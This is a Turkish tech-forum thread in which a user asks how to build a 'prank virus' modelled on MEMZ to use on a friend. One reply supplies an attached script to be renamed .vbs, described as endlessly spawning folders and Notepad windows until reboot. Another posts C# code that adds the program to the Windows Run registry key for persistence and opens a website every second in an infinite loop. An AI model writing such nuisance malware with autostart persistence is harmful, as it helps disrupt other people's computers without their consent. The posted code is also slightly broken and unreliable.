Arkadaşıma şaka yapmak için virüs nasıl yaparım?

Earas

Hectopat
Yer
İstanbul
Daha demin küçükken izlediğim memz virüsü test videosunu gördüm. Arkadaşıma şaka amaçlı görev yöneticisinden kapatınca kapanan bir virüs yapabilir miyim acaba diye düşündüm. Okulda 1 dönemdir C# görüyorum ve python biliyorum. Sanırım Visual Basic ile yapılıyormuş virüsler. Ben nasıl yapabilirim? Etkilerinin videodaki gibi olmasını istiyorum.
Bu içeriği görüntülemek için üçüncü taraf çerezlerini yerleştirmek için izninize ihtiyacımız olacak.
Daha detaylı bilgi için, çerezler sayfamıza bakınız.

Son düzenleyen: Moderatör:
Bu içeriği görüntülemek için üçüncü taraf çerezlerini yerleştirmek için izninize ihtiyacımız olacak.
Daha detaylı bilgi için, çerezler sayfamıza bakınız.
Evet hocam Mustafa V2 olacağım. Hakkınızı şimdiden helal edin. 😬😬 (Aranızda Emre var mı küçük bir şey deneyeceğim)

Hocam güldüm eğlendik de cevap bulamadım hâlâ. 🙂 Visual Studio ile yapabilir miyim virüsü?

Son düzenleme:
Evet hocam Mustafa V2 olacağım. Hakkınızı şimdiden helal edin. 😬😬 (Aranızda Emre var mı küçük bir şey deneyeceğim)

Hocam güldüm eğlendik de cevap bulamadım hâlâ. 🙂 Visual Studio ile yapabilir miyim virüsü?
Visual Studioya gerek yok. Bu belgenin uzantısını .vbs olarak değiştir. Kapatman için yapman gereken tek şey cihazı yeniden başlatmak. (Başka çözüm yolu yok .) (Virüs derse normal çünkü bu bir şaka yazılımı.)

Dosya Ekleri

• Yeni Metin Belgesi.txt
    83 bayt · Görüntüleme: 137
Galiba yanlış anlamadıysam bu virüs açıldığında sürekli rastgele klasörler oluşturup not defteri vs. açıyor. C# biliyorsanız bu virüsten iyisini bile yaparsınız diye düşünüyorum. Örneğin while komutu ile cmd'ye sürekli output verebilirsiniz. Tabi ben çok bilmiyorum bu sadece bir örnek.

C#:
using System;
using System.Diagnostics;

private void Form1_Load(object sender, System.EventArgs e)
{  
    RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true); //Bilgisayar her açıldığında program çalışacak.
    key.SetValue(VirusAdi, "\"" + Application.ExecutablePath + "\"");

while (true)
    {
    Process.Start("https://technopat.net/"); //1 saniyede 1 technopat.net açılacak.
    System.Threading.Thread.Sleep(1000);
    }
}

Sorumluluk kabul etmiyorum.

Son düzenleme:

Geri
Yukarı